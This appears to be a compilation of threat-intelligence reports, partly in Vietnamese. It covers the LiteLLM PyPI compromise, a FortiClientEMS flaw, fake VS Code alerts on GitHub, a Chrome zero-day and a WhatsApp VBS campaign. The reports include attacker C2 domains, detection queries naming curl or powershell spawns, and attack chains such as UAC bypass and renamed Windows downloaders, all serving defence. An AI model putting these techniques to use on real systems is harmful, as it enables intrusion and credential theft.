The LiteLLM compromise is Phase 09 of an ongoing campaign. Endor Labs assesses with high confidence that this campaign is not over.

6. Analysis

Technically, the LiteLLM attack is not especially sophisticated — the payload is straightforward, the .pth mechanism is well-documented, the encryption scheme is standard. What makes this incident significant is the strategic position LiteLLM occupies in modern AI infrastructure.

LiteLLM is not an ordinary library. It is an LLM gateway — its entire function is to hold API keys for dozens of providers simultaneously: OpenAI, Anthropic, Google Vertex, AWS Bedrock, Azure OpenAI. A single compromised LiteLLM instance doesn't lose one credential set; it loses the entire AI stack's credential surface. That is exactly why TeamPCP targeted it. The ROI per compromise is unusually high.

The most uncomfortable observation from a SOC perspective: this incident was not detected by EDR, SIEM, or any security tooling. It was caught by a developer who noticed his machine had frozen due to a fork bomb — an unintentional bug in the malware. Without that bug, this campaign would likely still be running. Security teams should resist the comfort of "we have EDR coverage." Does your EDR monitor developer laptops when they work remotely? Can it detect an outbound HTTPS POST to a domain that looks entirely legitimate — like models.litellm.cloud?

According to Wiz Research, LiteLLM is present in 36% of monitored cloud environments. If your organization has deployed AI agents, MCP servers, or any LLM orchestration tooling in the past six months, LiteLLM is likely somewhere in your transitive dependency tree — regardless of whether anyone explicitly installed it.

The broader pattern to recognize: this campaign represents an escalation from build-time attacks (CI/CD pipelines) to runtime attacks (developer machines and production environments). Traditional supply chain defense concentrates on the build pipeline. TeamPCP has pivoted directly to where credentials actually live — developer workstations. This shift demands a corresponding adjustment in threat modeling.

7. Recommendations

Immediate (0–24h)

Assess exposure:

# Check installed LiteLLM version
pip show litellm 2>/dev/null | grep -E "^Version|^Location"
pip list --format=freeze | grep litellm
 
# Search all virtual environments
find / -name "litellm_init.pth" 2>/dev/null
find / -path "*/litellm/proxy/proxy_server.py" -exec grep -l "tpcp\|base64" {} \; 2>/dev/null
 
# Check for persistence
[ -f ~/.config/sysmon/sysmon.py ] && echo "COMPROMISED: sysmon.py found"
[ -f ~/.config/systemd/user/sysmon.service ] && echo "COMPROMISED: sysmon.service found"

If v1.82.7 or v1.82.8 was ever installed:

# Remove package and purge cache
pip uninstall litellm -y
pip cache purge
rm -rf ~/.cache/uv
 
# Reinstall from last clean version
pip install litellm==1.82.6

Rotate credentials in priority order:

1. PyPI tokens (if you are a package maintainer)
2. Cloud provider credentials (AWS IAM keys, GCP service accounts, Azure service principals)
3. Kubernetes kubeconfig and service account tokens
4. SSH keys
5. API keys in .env files
6. Database credentials
7. GitHub Personal Access Tokens

Review network logs for traffic to:

models.litellm.cloud
checkmarx.zone
scan.aquasecurtiy.org

Audit Kubernetes cluster (if applicable):

# Look for unauthorized pods in kube-system
kubectl get pods -n kube-system | grep -E "node-setup|alpine"
 
# Check for unexpected secret access events
kubectl get events --all-namespaces | grep -i "secret"
 
# Search for attacker-created repositories
gh api /orgs/<YOUR_ORG>/repos | jq '.[].name' | grep docs-tpcp

Short-term (1–7 days)

Full dependency audit:

# Find all LiteLLM references across the codebase
grep -r "litellm" . --include="*.txt" --include="*.toml" --include="*.cfg"
 
# Audit transitive dependencies
pip-audit --requirement requirements.txt
# or
safety check -r requirements.txt

Pin versions explicitly in all dependency files:

# requirements.txt
litellm==1.82.6  # verified clean, explicitly pinned

Audit CI/CD pipelines for Trivy and Checkmarx usage:

# Replace floating version tags with commit SHAs
# BEFORE (unsafe)
uses: aquasecurity/trivy-action@v0.20.0
 
# AFTER (safe — pinned to commit SHA)
uses: aquasecurity/trivy-action@9b2b452e66...  # verify SHA from official channel

Add network egress monitoring: Restrict outbound connections from build environments to explicitly whitelisted domains. On developer endpoints, flag unusual outbound HTTPS POST requests — particularly to recently registered domains.

Long-term

Adopt a dependency pinning strategy across the board:

• Use lock files (poetry.lock, uv.lock, hashed requirements.txt) for all production deployments
• Implement a private package mirror (Artifactory, Nexus) with malware scanning before packages enter internal environments
• Automate SBOM generation in CI/CD to maintain a complete transitive dependency inventory

Harden CI/CD pipelines:

• Never expose GITHUB_TOKEN or long-lived secrets in workflows triggered by pull_request_target from forks
• Pin all GitHub Actions to commit SHAs — version tags can be force-pushed without warning
• Replace long-lived PyPI publishing tokens with OIDC-based short-lived tokens

Build detection capability:

• Deploy EDR with visibility on developer endpoints, not only production servers
• Integrate PyPI malware feeds (Sonatype OSS Index, Checkmarx SCA, Snyk) as a CI/CD quality gate
• Alert on .pth file creation in Python site-packages directories
• Monitor for newly created systemd user services on Linux endpoints

Establish AI tooling governance:

• Inventory all AI-related packages in active use across the organization
• Assign human ownership to every AI agent or tool in operation
• Apply least-privilege to AI agent credentials — use ephemeral, sender-constrained tokens rather than long-lived API keys
• Do not connect AI agents to production systems during the experimentation phase

8. References

1. Orca Security — LiteLLM Supply Chain Attack: Malware & Mitigation (2026-03-24)
2. Endor Labs — TeamPCP Isn't Done: Threat Actor Behind Trivy and KICS Compromises Now Hits LiteLLM's 95 Million Monthly Downloads on PyPI (2026-03-24)
3. Snyk — How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM (2026-03-26)
4. FutureSearch / Callum McMahon — litellm 1.82.8 Supply Chain Attack on PyPI (March 2026) (2026-03-24)
5. Palo Alto Networks Unit 42 — Weaponizing the Protectors: TeamPCP's Multi-Stage Supply Chain Attack on Security Infrastructure (2026-04-01)
6. Arctic Wolf — TeamPCP Supply Chain Attack Campaign Targets Trivy, Checkmarx (KICS), and LiteLLM (2026-03-24)
7. Kaspersky — Trojanization of Trivy, Checkmarx, and LiteLLM solutions (2026-04-03)
8. SANS Institute — When the Security Scanner Became the Weapon: Inside the TeamPCP Supply Chain Campaign (2026-04-03)
9. LiteLLM Official — Security Update: Suspected Supply Chain Incident (2026-03-24)
10. GitGuardian — How GitGuardian Enables Rapid Response to the LiteLLM Supply Chain Attack (2026-03-30)
11. Sonatype — Compromised litellm PyPI Package Delivers Multi-Stage Credential Stealer (2026-04-03)
12. InfoQ — PyPI Supply Chain Attack Compromises LiteLLM, Enabling the Exfiltration of Sensitive Information (2026-04-01)

Thông tin chi tiết

• Định danh lỗ hổng: CVE-2026-35616

• Điểm CVSS (3.1): 9.8

• Mức độ nghiêm trọng: CRITICAL - Cực kỳ nghiêm trọng

• Mô tả: Lỗi kiểm soát truy cập sai cách (improper access control) trong FortinetClientEMS có thể bị kẻ tấn công ẩn danh (unauthenticated attacker) khai thác thực thi mã hoặc chạy lệnh hệ thống trái phép thông qua các request độc hại gửi tới máy chủ mục tiêu.

• Phiên bản bị ảnh hưởng: FortinetClientEMS phiên bản 7.4.5 đến 7.4.6

FortiClientEMS hay FortiClient Enterprise Management Server đóng vai trò là một máy chủ bảo mật cho phép quản lý tập trung các thiết bị đầu cuối (endpoint) trong mạng nội bộ của doanh nghiệp. Phần mềm này cho phép quản trị viên có thể dễ dàng triển khai, cấu hình, giám sát và cập nhật FortiClient trên nhiều máy tính một cách tự động, đồng thời kiểm soát bảo mật đối với các thiết bị trong mạng lưới cũng như thay đổi các chính sách, tuân thủ nội bộ.

Tại hai phiên bản FortiClientEMS 7.4.5 và 7.4.6, phần mềm này tồn tại một điểm yếu trong việc kiểm soát các yêu cầu truy cập được gửi tới hệ thống. Việc xử lý không an toàn này cho phép kẻ tấn công ẩn danh (unauthenticated attacker) từ xa, thông qua các request được gửi tới, có thể thực thi mã hoặc chạy lệnh trái phép trên hệ thống mục tiêu, từ đó giành quyền kiểm soát máy chủ FortiClientEMS chỉ từ một điểm tấn công bên ngoài.

CVE-2026-35616 tác động tới FortiClientEMS với những rủi ro cực kỳ lớn. Việc khai thác nhắm tới hệ thống này được coi là đòn bẩy mạnh mẽ cho kẻ tấn công do vai trò đầu não của nó. Một khi FortinetClientEMS bị hạ gục, toàn bộ các thiết bị đầu cuối mà nó kiểm soát đều sẽ bị đe dọa, tin tặc có thể tự do hành động các bước tấn công tiếp theo như triển khai mã độc tống tiền, di chuyển ngang trong mạng nội bộ hay đánh cắp thông tin nhạy cảm của hệ thống.

Đáng chú ý, chỉ tính riêng từ đầu năm 2026, FortinetClientEMS đã hai lần nhận được bản vá khẩn cấp. Trước đó vào tháng 2, như FPT Threat Intelligence đã đưa tin, Fortinet tiến hành vá CVE-2026-21643 do lỗi xử lý các phần tử trong câu lệnh SQL được truyền vào, cho phép kẻ tấn công ẩn danh thực thi mã hoặc câu lệnh trái phép thông qua các HTTP request độc hại.

Hãng Fortinet cho biết CVE-2026-35616 và CVE-2026-21643 đều đang bị tin tặc tích cực khai thác trên thực tế. Theo watchTowr, các nỗ lực khai thác CVE-2026-35616 được ghi nhận bởi hệ thống bẫy honeypot của họ lần đầu tiên vào ngày 31 tháng 3 năm 2026. Trong thống kê của Shadowserver, trên toàn thế giới có hơn 2.000 máy chủ FortinetClientEMS có nguy cơ trở thành mục tiêu do chưa cập nhật bản vá bảo mật mới nhất, với Hoa Kỳ và Đức là hai quốc gia có số lượng instance dễ bị khai thác nhiều nhất, lần lượt là 593 và 163 máy chủ. Tại Việt Nam, con số này hiện nay được ghi nhận là 4.

Khắc phục & Khuyến nghị

Do tính chất đặc biệt nghiêm trọng và hệ lụy diện rộng mà các lỗ hổng này mang lại, đội ngũ FPT Threat Intelligence khuyến nghị các đơn vị đang vận hành hệ thống Fortinet thực hiện ngay các biện pháp sau:

1. Cập nhật bản vá cho phần mềm: Cập nhật FortiClientEMS lên phiên bản 7.4.7 hoặc mới hơn. Điều này là cực kỳ quan trọng để đảm bảo sự an toàn cho hệ thống. Fortinet đã cung cấp hướng dẫn cập nhật cho hai phiên bản bị ảnh hưởng bởi CVE-2026-35616 tại hai liên kết dưới đây:

   • https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484 cho phiên bản FortiClientEMS 7.4.5

   • https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484 cho phiên bản FortiClientEMS 7.4.6

   Ngoài ra, phiên bản FortinetClientEMS 7.4.2 không bị tác động bởi lỗ hổng này.

2. Hạn chế truy cập từ bên ngoài: Không cho phép truy cập FortiClient EMS trực tiếp từ Internet. Chỉ cho phép quản trị từ mạng nội bộ hoặc các địa chỉ IP đáng tin cậy.

3. Theo dõi và kiểm tra hệ thống: Thường xuyên kiểm tra log hệ thống để phát hiện các truy cập hoặc hành vi bất thường, kịp thời xử lý nếu có dấu hiệu xâm nhập.

4. Tăng cường biện pháp bảo vệ tạm thời: Trong trường hợp chưa thể cập nhật ngay, nên áp dụng các biện pháp bảo vệ bổ sung như lọc truy cập web hoặc tăng cường giám sát bảo mật 24/7 để kịp thời ngăn chặn các dấu hiệu bất thường giúp giảm thiểu rủi ro.

Tham khảo

1. API authentication and authorization bypass

2. FPT Threat Intelligence

3. Shadowserver

Một trong hàng nghìn Discussion giả mạo được đăng trên GitHub (Nguồn: Socket)

Khi bạn nhận được email thông báo từ GitHub rằng một repository bạn đang follow vừa post cảnh báo bảo mật khẩn cấp cho VS Code — bạn click vào. Đó chính xác là điều attackers đang cược.

Một chiến dịch phishing quy mô lớn phát hiện cuối tháng 3/2026 đang lạm dụng tính năng GitHub Discussions để phát tán malware, nhắm trực tiếp vào developer community. Điểm đáng lo ngại không phải là kỹ thuật phishing — mà là platform bị lạm dụng: GitHub, môi trường làm việc hàng ngày mà developer tin tưởng tuyệt đối.

Chi tiết chiến dịch

Bước 1 — Flood GitHub Discussions bằng fake advisory

Attackers tạo hàng loạt GitHub Discussions với tiêu đề giả mạo security advisory:

• "Visual Studio Code – Severe Vulnerability – Immediate Update Required"

• "Critical Exploit – Urgent Action Needed"

• "Severe Threat – Update Immediately"

Mỗi post chứa fake CVE ID, version range bịa đặt, và link download "bản vá khẩn cấp" trỏ về file-sharing service bên ngoài (chủ yếu Google Drive).

Hàng trăm Discussions giả mạo xuất hiện đồng loạt trên GitHub search (Nguồn: Socket)

Hàng nghìn post gần như giống hệt nhau xuất hiện chỉ trong vài phút, được đăng từ các tài khoản mới tạo hoặc có hoạt động rất thấp. Đây là dấu hiệu rõ của automation, không phải tấn công thủ công.

Bước 2 — GitHub tự động amplify reach

Đây là điểm thiết kế thông minh nhất của chiến dịch, và cũng là lý do tại sao GitHub là target lý tưởng.

Khi một Discussion được tạo hoặc user bị tag, GitHub tự động gửi email notification đến tất cả watcher và participant của repository. Kết quả: phishing message không chỉ nằm trên platform — nó xuất hiện trực tiếp trong inbox của developer, dưới dạng email gửi từ địa chỉ notifications@github.com.

GitHub Discussions trigger email notifications tới toàn bộ watcher (Nguồn: Socket)

Email từ GitHub domain, nội dung trông như security advisory, urgency language — ba yếu tố này cộng lại đủ để bypass cả người dùng kinh nghiệm.

Bước 3 — Chuỗi redirect nhiều lớp có cookie-awareness

Victim click link trong Discussion → không bị dẫn thẳng đến malware. Thay vào đó là một redirection chain được thiết kế để lọc traffic:

GitHub Discussion link
    ↓
share.google/... (Google endpoint)
    ↓ (phân nhánh dựa trên cookie)
    ├── CÓ Google cookie → 301 redirect → drnatashachinn[.]com (C2 thực sự)
    └── KHÔNG có cookie → nhận fingerprinting page trực tiếp
    ↓
JavaScript fingerprinting + auto-POST data về C2

Logic phân nhánh dựa trên Google cookie là chi tiết kỹ thuật quan trọng nhất: hầu hết real user đang dùng browser bình thường đều có Google cookie active, nên họ bị route thẳng đến C2. Bot, scanner, và automated analysis tools thường không có cookie → nhận response khác, tránh được detection.

Bước 4 — JavaScript fingerprinting tại landing page

Landing page tại C2 không deliver malware ngay. Thay vào đó, một JavaScript script obfuscate nặng (dùng array-shuffling và string reconstruction) thu thập:

• Timezone và locale của browser

• Platform và user-agent

• Secondary user-agent qua hidden iframe

• Automation signals: navigator.webdriver (phát hiện headless browser/bot)

• URL hash values (dùng cho campaign tracking)

Toàn bộ data được encode và tự động POST về cùng endpoint mà không cần user interaction. Không có malware, không có credential harvesting ở giai đoạn này.

Behavior này nhất quán với Traffic Distribution System (TDS) — một lớp filtering/profiling trước khi route victim đến secondary attack stage (phishing page, exploit kit, hoặc payload download tùy loại nạn nhân). Tại thời điểm phân tích, secondary stage chưa được xác định.

Tại sao GitHub là target lý tưởng

Pattern này không ngẫu nhiên. Attackers đã khai thác GitHub hai lần trước đó:

• Tháng 3/2025: Chiến dịch nhắm vào 12.000 repositories, lừa developer authorize một OAuth app độc hại để chiếm quyền truy cập tài khoản

• Tháng 6/2024: Khai thác GitHub email system qua spam comment và pull request để redirect user đến phishing page

GitHub Discussions là vector mới nhất vì một lý do đơn giản: moderation threshold thấp hơn nhiều so với official security advisories. Bất kỳ tài khoản nào cũng có thể post Discussion vào hầu hết public repository, không cần approval.

Kết hợp với notification system tự động và trust context của platform, Discussions đang trở thành phishing delivery channel hiệu quả hơn cả email truyền thống đối với developer audience.

Và chiến dịch này không đơn độc — GitHub-hosted malware campaign uses split payload to evade detection được Help Net Security ghi nhận cùng tuần cho thấy pattern tương tự: attackers đang đẩy infostealer qua hơn 300 package giả mạo AI tool và game cheat, hosted trực tiếp trên GitHub. GitHub đang bị biến thành malware distribution infrastructure, không chỉ là attack vector một lần.

Góc nhìn từ phía defender

Developer đang bị nhắm đích vì lý do cụ thể

Developer machine không phải target ngẫu nhiên. Một workstation của developer thường chứa: source code của công ty, SSH key và API token, credential truy cập cloud environment, và access vào CI/CD pipeline. Một lần nhiễm malware trên developer endpoint có thể cascade thành supply chain compromise với phạm vi ảnh hưởng rộng hơn nhiều so với endpoint user thông thường.

Chiến dịch này nhắm vào VS Code cụ thể là vì VS Code là IDE phổ biến nhất trong developer community — attack surface rộng nhất có thể.

TDS là dấu hiệu của operation chuyên nghiệp

Việc dùng Traffic Distribution System thay vì deliver malware trực tiếp cho thấy operation có đầu tư. TDS cho phép operator: A/B test payload theo geolocation, lọc bot và researcher, thay đổi secondary payload mà không cần update primary infrastructure, và track conversion rate theo campaign. Đây không phải tool của script kiddie.

Fake CVE là red flag có thể verify ngay

Một trong những điểm yếu của chiến dịch là CVE fabricated. Mọi CVE hợp lệ đều có thể verify trong vòng 30 giây tại NVD hoặc MITRE CVE. Nếu CVE trong cảnh báo không tồn tại trong database — đó là lure.

Detection và phòng thủ

Cho individual developer

Verify trước khi click:

• CVE thật phải có trong NVD, MITRE CVE, hoặc CISA KEV catalog

• VS Code update chỉ đến từ code.visualstudio.com hoặc trong-app update — không bao giờ từ Google Drive

• Account đăng advisory mới tạo hoặc ít hoạt động → red flag

Indicators cần chú ý:

C2 domain:    drnatashachinn[.]com
Redirect:     share.google → 301 → C2
Pattern:      Fake CVE + external download link + urgency + mass-tagging

Cho security team và tổ chức

# Monitor outbound connection từ developer endpoint đến domain lạ
# sau khi click link từ GitHub notification email
network.destination: *drnatashachinn* OR
    (referrer: "github.com/*/discussions/*" AND destination: !github.com)

# Hunt GitHub Discussion notification email chứa external download link
email.sender: "notifications@github.com"
AND email.body: ("google drive" OR "drive.google" OR "mega.nz")
AND email.body: ("vulnerability" OR "CVE" OR "critical")

# Process spawn bất thường sau khi browser mở link từ GitHub
parent_process: browser
AND child_process: (powershell OR cmd OR wscript OR curl)

Khuyến nghị tổ chức:

• Enforce policy: software update chỉ qua approved channels, không phải link từ third-party

• Train developer team nhận biết GitHub-based phishing — khác với email phishing truyền thống

• Consider network egress filtering cho developer endpoint, đặc biệt đối với domain không thuộc whitelist xuất hiện sau GitHub notification click

Nhận định

GitHub Discussions bị vũ khí hóa thành phishing channel là một bước leo thang đáng lo ngại — không phải vì kỹ thuật quá tinh vi, mà vì nó khai thác trust theo cách rất khó train người dùng phòng tránh. Developer được training để cẩn thận với email lạ. Họ không được training để nghi ngờ notification từ notifications@github.com về repository họ đang contribute.

Pattern này sẽ tiếp tục. GitHub không phải platform duy nhất có collaborative feature bị khai thác kiểu này — GitLab Issues, Bitbucket, npm package READMEs đều là attack surface tiềm năng tương tự. Defender cần shift từ "trust the platform, verify the content" sang "verify cả platform feature được dùng để deliver content".

Nguồn tham khảo:

• Widespread GitHub Campaign Uses Fake VS Code Security Alerts to Deliver Malware — Socket Security (Sarah Gooding, Peter van der Zee)

• Fake VS Code alerts on GitHub spread malware to developers — BleepingComputer

• GitHub-hosted malware campaign uses split payload to evade detection — Help Net Security / Netskope

• Major phishing campaign on GitHub using fake security alerts — Techzine

• Strengthening supply chain security: Preparing for the next malware campaign — GitHub Security Blog

Thông tin chi tiết

• Định danh lỗ hổng: CVE-2026-5281

• Điểm CVSS (3.1): 8.8

• Mức độ nghiêm trọng: HIGH - Nghiêm trọng cao

• Mô tả tóm tắt: Lỗi use-after-free (sử dụng bộ nhớ sau khi giải phóng) trong thành phần Dawn trên Google Chrome, cho phép kẻ tấn công từ xa sau khi chiếm được quyền kiểm soát tiến trình renderer (tiến trình kết xuất) có thể thực thi mã tùy ý thông qua một trang HTML độc hại.

• Phiên bản bị ảnh hưởng: Google Chrome trước phiên bản 146.0.7680.178

Dawn là một dự án mã nguồn mở trong hệ sinh thái Chromium, đóng vai trò là bản thực thi (implementation) chính thức của tiêu chuẩn WebGPU. Đây là lớp trung gian (middleware) cho phép các ứng dụng web truy cập trực tiếp và hiệu quả vào khả năng tính toán đồ họa của phần cứng (GPU) thông qua trình duyệt.

Chức năng cốt lõi của Dawn bao gồm:

• Cung cấp API WebGPU: Thay thế WebGL để giải quyết các hạn chế về hiệu suất, hỗ trợ các tính năng hiện đại như Compute Shaders và xử lý đa luồng.

• Quản lý Tài nguyên: Tự động hóa việc quản lý bộ nhớ GPU, pipeline state và đồng bộ hóa các lệnh thực thi.

• Tính di động (Portability): Cung cấp một lớp trừu tượng duy nhất cho các lập trình viên và nhà phát triển, giúp mã nguồn chạy nhất quán trên các kiến trúc phần cứng khác nhau.

Do tiếp xúc trực tiếp với Driver đồ họa nên Dawn được thiết kế với các cơ chế bảo mật nghiêm ngặt. Lớp trung gian này luôn duy trì kiểm tra tính hợp lệ của lệnh trước khi gửi tới GPU để tránh lỗi tràn bộ nhớ hoặc can thiệp trái phép, đồng thời hoạt động cô lập trong tiến trình GPU riêng biệt nhằm hạn chế rủi ro khai thác từ lỗ hổng Use-after-free hoặc truy cập bộ nhớ ngoài phạm vi (Out-of-bounds).

Tuy nhiên, trong đợt phát hành bản vá bảo mật mới nhất của Google, hãng thông báo thành phần này đang bị tin tặc tích cực khai thác trong các cuộc tấn công trên thực tế, do sự xuất hiện của một lỗ hổng zero-day nghiêm trọng mới trong trình duyệt Google Chrome, được định danh CVE-2026-5281 - một lỗi Use-after-free trong thành phần Dawn.

Thông thường lỗi Use-after-free xảy ra khi một chương trình tiếp tục truy cập hoặc sử dụng một con trỏ (pointer) trỏ đến vùng nhớ đã được giải phóng (deallocated/freed). Kẻ tấn công từ xa có thể lợi dụng lỗ hổng này để đánh lừa hệ thống và ghi đè những dữ liệu độc hại vào vùng nhớ đã giải phóng. Khi chương trình thực hiện lệnh gọi hàm từ con trỏ cũ, nó sẽ thực thi mã của kẻ tấn công thay vì mã gốc.

Trong ngữ cảnh của CVE-2026-5281, Google cho biết nếu kẻ tấn công từ xa kiểm soát được tiến trình render của trình duyệt, có thể tuỳ ý thực thi mã trên hệ thống mục tiêu thông qua một trang HTML độc hại chứa đoạn mã khai thác, đồng thời không ngoại trừ khả năng lỗ hổng này cũng có thể bị lợi dụng làm bàn đạp nhằm vượt qua các cơ chế "sandbox" bảo mật của trình duyệt, tạo tiền đề triển khai các payload độc hại tiếp theo, khai thác leo thang đặc quyền, tiếp cận dữ liệu nhạy cảm hoặc gây ra tình trạng xung đột bộ nhớ dẫn đến crash ứng dụng, gây tình trạng từ chối dịch vụ trên hệ thống.

Đợt cập nhật này diễn ra ngay sau khi Google vừa xử lý hai lỗ hổng nghiêm trọng khác (CVE-2026-3909 và CVE-2026-3910) vốn cũng bị khai thác dưới dạng zero-day. Trước đó vào tháng 2, hãng này cũng đã vá một lỗi use-after-free trong thành phần CSS của Chrome (CVE-2026-2441). Tính tổng cộng, kể từ đầu năm đến nay, Google đã vá 4 lỗ hổng zero-day của Chrome bị khai thác trên thực tế.

Khắc phục & Khuyến nghị

Mức độ nguy hiểm và phạm vi ảnh hưởng mà lỗ hổng này tác động là cực kỳ lớn do trình duyệt Google Chrome được sử dụng rộng rãi bởi người dùng cá nhân, các doanh nghiệp hay các trình duyệt phụ thuộc nhân Chromium như Microsoft Edge, Brave, Opera,... Do đó việc khắc phục, áp dụng các bản vá bảo mật mới nhất là điều cấp thiết, cần được thực hiện ngay.

Đội ngũ FPT Threat Intelligence khuyến nghị:

1. Cập nhật trình duyệt: Người dùng và các quản trị viên hệ thống có sử dụng Google Chrome hay các trình duyệt nhân Chromium tương ứng cần áp dụng bản vá mới nhất dưới đây:

   • Windows và MacOS: 146.0.7680.177 / 178

   • Linux: 146.0.7680.177

2. Cảnh giác trước các website lạ: Tránh truy cập vào các website không rõ nguồn gốc, được gửi kèm trong email hay các liên kết lạ trên mạng xã hội hay từ các nguồn không rõ trên internet.

3. Giám sát các hành vi bất thường: Đối với môi trường doanh nghiệp, quản trị viên hệ thống có thể triển khai giám sát lưu lượng mạng, giám sát hệ thống 24/7 nhằm phát hiện sớm các dấu hiệu bất thường cũng như ngăn chặn các hành vi khai thác nguy hiểm nhắm tới hệ thống.

Tham khảo

1. Chrome releases

Tóm Tắt

Vào cuối tháng 2 năm 2026, nhóm Microsoft Defender Experts đã phát hiện một chiến dịch tấn công tinh vi sử dụng ứng dụng nhắn tin WhatsApp để phát tán các tệp Visual Basic Script (VBS) độc hại đến người dùng Windows. Sau khi nạn nhân thực thi tệp này, một chuỗi lây nhiễm nhiều giai đoạn sẽ được kích hoạt, dẫn đến việc kẻ tấn công chiếm quyền kiểm soát hoàn toàn hệ thống thông qua các backdoor MSI. Điểm đặc biệt của chiến dịch là việc kết hợp giữa kỹ thuật social engineering, Living-off-the-Land (LotL) và cloud infrastructure công khai để né tránh các giải pháp bảo mật.

Bức Tranh Mối Đe Dọa (Threat Landscape)

Chiến dịch này nằm trong xu hướng tấn công ngày càng phổ biến: khai thác các nền tảng liên lạc đáng tin cậy như WhatsApp để phát tán mã độc. Thay vì dùng email phishing truyền thống, kẻ tấn công khai thác lòng tin mà người dùng đặt vào các ứng dụng nhắn tin quen thuộc để vượt qua rào cản tâm lý. Điều đáng lo ngại là hiện tại chưa xác định được nội dung mồi nhử (lure) mà kẻ tấn công dùng để thuyết phục nạn nhân mở file VBS.

Chuỗi Tấn Công Chi Tiết (Attack Chain)

Chiến dịch được chia thành 4 giai đoạn rõ ràng, với mỗi giai đoạn xây dựng nền tảng cho giai đoạn tiếp theo:

Giai đoạn 1 — Xâm nhập ban đầu (Initial Access via WhatsApp)

Tệp VBS độc hại được gửi trực tiếp qua tin nhắn WhatsApp. Khi nạn nhân thực thi, script sẽ:

• Tạo thư mục ẩn tại C:\ProgramData\EDS8738

• Sao chép và đổi tên các công cụ Windows hợp lệ: curl.exe → netapi.dll, bitsadmin.exe → sc.exe

• Các file đổi tên này vẫn giữ nguyên metadata PE gốc (OriginalFileName), tạo ra tín hiệu phát hiện tiềm năng cho các giải pháp EDR

Giai đoạn 2 — Tải payload từ cloud (Payload Retrieval)

Sử dụng các binary đã đổi tên ở trên với cờ downloader, malware kết nối đến các dịch vụ cloud uy tín để tải payload thứ cấp:

• auxs.vbs và WinUpdate_KB5034231.vbs được host trên AWS S3, Tencent Cloud, và Backblaze B2

• Kỹ thuật này khiến các request độc hại trông như traffic hệ thống bình thường, gây khó khăn cho việc phân biệt hoạt động hợp lệ và tấn công

Giai đoạn 3 — Leo thang đặc quyền & Persistence

Đây là giai đoạn then chốt nhất của chiến dịch:

• Malware sửa giá trị registry ConsentPromptBehaviorAdmin để vô hiệu hóa UAC prompt

• Liên tục thử khởi chạy cmd.exe với đặc quyền cao, lặp lại cho đến khi thành công hoặc bị ngắt buộc

• Ghi cơ chế persistence vào registry tại HKLM\Software\Microsoft\Win để đảm bảo tồn tại qua các lần reboot

• Toàn bộ quá trình leo thang đặc quyền diễn ra không cần tương tác người dùng

Giai đoạn 4 — Triển khai backdoor cuối (Final Payload)

Giai đoạn cuối cùng cài đặt các MSI installer không có chữ ký số hợp lệ:

Thông qua AnyDesk giả mạo, kẻ tấn công đạt được quyền truy cập từ xa liên tục, cho phép đánh cắp dữ liệu, triển khai malware bổ sung hoặc biến hệ thống thành một node trong botnet.

Phân Tích Kỹ Thuật (Technical Analysis)

MITRE ATT&CK Mapping

Điểm Nổi Bật Về Evasion

Chiến dịch này đặc biệt nguy hiểm bởi sự kết hợp nhiều kỹ thuật né tránh cùng lúc. Việc dùng binary hợp lệ của Windows (LotL) kết hợp với cloud hosting khiến các giải pháp bảo mật dựa trên signature và domain reputation gần như vô dụng. Hơn nữa, kỹ thuật delayed execution và thực thi từng giai đoạn giúp tránh các hệ thống sandbox phát hiện hành vi.

Indicators of Compromise (IoC)

SHA-256 Hashes — VBS Scripts (Initial Stage)

SHA-256 Hashes — VBS Droppers (Cloud Stage)

SHA-256 Hashes — MSI Installers (Final Payload)

URLs — Cloud Payload Hosting

C2 Domains

Hunting Queries (Microsoft Defender / KQL)

Đây là các query do Microsoft cung cấp để truy tìm hoạt động liên quan:

Phát hiện thực thi VBS script độc hại:

DeviceProcessEvents
| where InitiatingProcessFileName has "wscript.exe"
| where InitiatingProcessCommandLine has_all ("wscript.exe",".vbs")
| where ProcessCommandLine has_all ("ProgramData","-K","-s","-L","-o", "https:")

Phát hiện VBS payload stage tiếp theo:

DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".vbs"

Phát hiện MSI installer độc hại:

DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".msi"

Phát hiện outbound C2 communication:

DeviceNetworkEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where InitiatingProcessCommandLine has_all ("-s","-L","-o", "-k")

Khuyến Nghị Phòng Thủ (Mitigation & Recommendations)

Kiểm soát endpoint

• Chặn script host trong các đường dẫn không tin cậy: wscript.exe, cscript.exe, mshta.exe

• Giám sát các tiến trình Windows bị đổi tên và thực thi với cờ bất thường (đặc biệt là các flag của curl, bitsadmin)

• Bật EDR in block mode để chặn artifact độc hại ngay cả khi AV không phát hiện

Giám sát mạng & cloud

• Kiểm tra và lọc traffic đến các dịch vụ cloud như AWS S3, Tencent Cloud, Backblaze B2 trong bối cảnh doanh nghiệp

• Chặn kết nối đến các C2 domain đã biết: Neescil[.]top, velthora[.]top

Phát hiện persistence

• Giám sát liên tục các thay đổi registry tại HKLM\Software\Microsoft\Win

• Cảnh báo khi giá trị ConsentPromptBehaviorAdmin bị thay đổi (dấu hiệu bypass UAC)

• Theo dõi việc cài đặt MSI không có chữ ký số hợp lệ

Đào tạo người dùng

• Huấn luyện nhân viên không mở file đính kèm (đặc biệt .vbs, .js, .bat) nhận qua các nền tảng nhắn tin như WhatsApp, kể cả từ người quen

• Xây dựng quy trình báo cáo sự cố rõ ràng khi nhận được tin nhắn/file đáng ngờ

Giải pháp Microsoft cụ thể

• Bật cloud-delivered protection trong Microsoft Defender Antivirus

• Kích hoạt Tamper Protection kết hợp với DisableLocalAdminMerge

• Kích hoạt Attack Surface Reduction (ASR) rules để chặn các kỹ thuật LotL

Microsoft Defender Detections

Đánh Giá & Kết Luận

